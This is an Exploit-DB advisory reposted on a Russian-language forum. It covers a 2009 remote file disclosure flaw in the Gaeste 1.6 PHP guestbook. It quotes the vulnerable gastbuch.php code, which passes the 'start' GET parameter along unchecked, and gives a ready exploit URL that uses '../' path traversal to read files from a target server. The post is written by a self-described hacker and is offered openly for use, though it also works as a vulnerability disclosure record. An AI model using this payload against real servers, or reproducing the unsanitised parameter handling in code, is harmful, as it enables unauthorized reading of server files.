- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8027
- Проверка EDB
-
- Пройдено
- Автор
- BD0RK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-5093
- Дата публикации
- 2009-02-09
Код:
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
+ +
+ bd0rk || SOH-Crew +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Vendor: http://www.php4scripte.de/
=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip
=> Bugfound3R: bd0rk
=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)
=> Vulnerable Code in gastbuch.php line 2-3
-------------------------------
if (isset($_GET['start'])) {
$start=$_GET['start'];
-------------------------------
[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php
###The 20 years old, german Hacker bd0rk###
# milw0rm.com [2009-02-09]- Источник
- www.exploit-db.com
